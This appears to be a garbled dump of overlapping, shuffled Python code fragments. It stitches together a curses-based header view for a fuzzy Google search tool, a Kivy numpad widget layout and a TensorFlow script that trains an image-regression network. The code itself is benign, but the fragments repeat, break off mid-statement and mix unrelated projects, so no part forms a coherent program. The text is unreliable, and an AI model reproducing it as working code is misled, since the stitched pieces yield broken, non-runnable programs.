_end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0)", "need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info", "model import Model import runtime.config as runtime_config import utils.color as color progname =", "target.run() except curses.error as e: error = str(e) finally: target._end_curses() if error !=", "= 0 # Write Google google = list(GOOGLE) first_o = True for i", "self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height,", ") if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\"", "len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY)", "curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write", "first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else:", "%s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT,", "# Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) #", "google[i] if c == \"o\": if first_o: first_o = False self.window.addstr(0, i, c,", "self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2,", "self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0", "os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: #", "gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import", "sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need", "Write Google google = list(GOOGLE) first_o = True for i in range(len(google)): c", "else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy", ") self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\":", "views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug", "representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off", "logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error:", "error = str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\"", "else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1", "signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as", "self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), )", "os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: #", "= self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset()", "__init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__", "if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model", "_make_header(self): start_index = 0 # Write Google google = list(GOOGLE) first_o = True", "entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing", "logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window", "% error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing the", "turn off automatic echoing of keys to the screen curses.noecho() # Buffering off", "= info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\")", "self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width", "curses.error as e: error = str(e) finally: target._end_curses() if error != None: logger.error(error)", "\"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import", "# initscr() returns a window object representing the entire screen. logger.debug(\"init curses\") stdscr", "if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None,", "start_index = 0 # Write Google google = list(GOOGLE) first_o = True for", "first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\"))", "import runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties =", "Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need", "continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\":", "None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header]", "self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write", "self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width,", "curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create()", "debug # need when 「cat fixtures/rust.json | python -m gfzs」 # need when", "_init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894", "runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error)", "user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE:", "def _loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error: continue except", "| self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop()", "if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger", "handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for", "self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index =", "len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width", "logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh()", "len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH)", "# turn off automatic echoing of keys to the screen curses.noecho() # Buffering" ]
[ "0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint:", "0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback", "callback = None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class", "text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols:", "size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton:", "spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton:", "NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton:", "3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release:", "'3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7'", "NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>:", "'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text:", "BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text:", "4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3'", "text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text:", "on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout):", "'6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1", "'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1", "Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn = num", "0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint:", "text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''')", "self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num):", "size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton:", "class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn =", "<NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text:", "1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1)", "= 1 callback = None def select_btn(self, num): self.selected_btn = num if self.callback:", "on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5", "NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3,", "1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2)", "0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release:", "BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2)", "text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None", "text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text:", "NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton:", "size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton:", "select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1", "root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation:", "'4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8'", "'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None def", "<Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text:", "text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1", "'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1", "text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text:", "from kivy.uix.gridlayout import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>:", "self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback =", "root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num):", "''') class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn", "'1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y:", "size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1", "rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text:", "1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback =", "NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton:", "class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn =", "cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2'", "cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton:", "spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text:", "text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2", "BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal'", "BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1)", "'1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5'", "Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3", "<ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal'", "kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing:", "'2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class", "0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release:", "1 callback = None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num)", "size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service'", "root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn", "self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton:", "root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release:", "text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout:", "from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4", "ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn = num", "'9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation:", "num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def", "size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App'", "on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self,", "1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint:", "BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn =", "= num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None", "text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3", "'8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout:", "NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton:", "GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows:", "on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1'", "num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback", "orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8,", "3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton:", "text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text:", "'5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9'", "on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2'", "selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn = num if", "if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self,", "NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows:", "None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn", "<reponame>l337quez/Aplicaci-n-ANDROID-para-control-del-suministro-de-energia- from kivy.uix.gridlayout import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text)", "rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2,", "'7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing:", "import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3", "def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn =", "3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1'", "1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2,", "BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text:", "3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text:", "2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1", "Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton:", "'2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6'", "0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint:", "kivy.uix.gridlayout import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols:", "text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5", "= None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout):", "text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text:", "NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y:", "import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3,", "orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8,", "NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton:", "3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4'", "self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn" ]
[ "model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1))", "shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f = Path(\"model_structure.json\")", "pandas as pd from sklearn import model_selection import tensorflow as tf from pathlib", "[160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a bit", "x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train", "bit img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) #", "# img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\")", "image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape)", "220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160])", "dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a", "model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save", "255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3),", "a neural network that predicts an activity level based on a jpg image", "neural network that predicts an activity level based on a jpg image from", "img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with", "#, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure)", "x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test / 255 #y_train =", "with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0)", "batch of images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value", "model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) #", "x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model =", "= tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) #", "axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\",", "shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test =", "#print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] =", "160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25))", "test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160,", "df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x", "+ data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80,", "= tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor,", "x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid)", "#print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train", "This is an initial attempt at doing regression based on image data. It", "print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape)", "= np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train", "loosely based on TF image classification examples and \"Deep Leaning: Image Recognition\" on", "[y_value]) y[i] = y_value # convert image to a tensor # img_raw =", "y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure", "preprocess a batch of images sess = tf.Session() for i in range(0, data.datetime.count()):", "numpy as np import pandas as pd from sklearn import model_selection import tensorflow", "240]) # squish it down a bit img_tensor /= 255.0 # normalize to", "#model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3),", "= np.append(y, [y_value]) y[i] = y_value # convert image to a tensor #", "keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16)", "= np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) #", "#print(y.shape) # Read in and preprocess a batch of images sess = tf.Session()", "y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch", "is an initial attempt at doing regression based on image data. It is", "\"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000", "from sklearn import model_selection import tensorflow as tf from pathlib import Path \"\"\"", "based on TF image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com", "activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit(", "tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish", "to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw", "img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train)", "down a bit img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor)", "= y_train / 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) =", "keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = 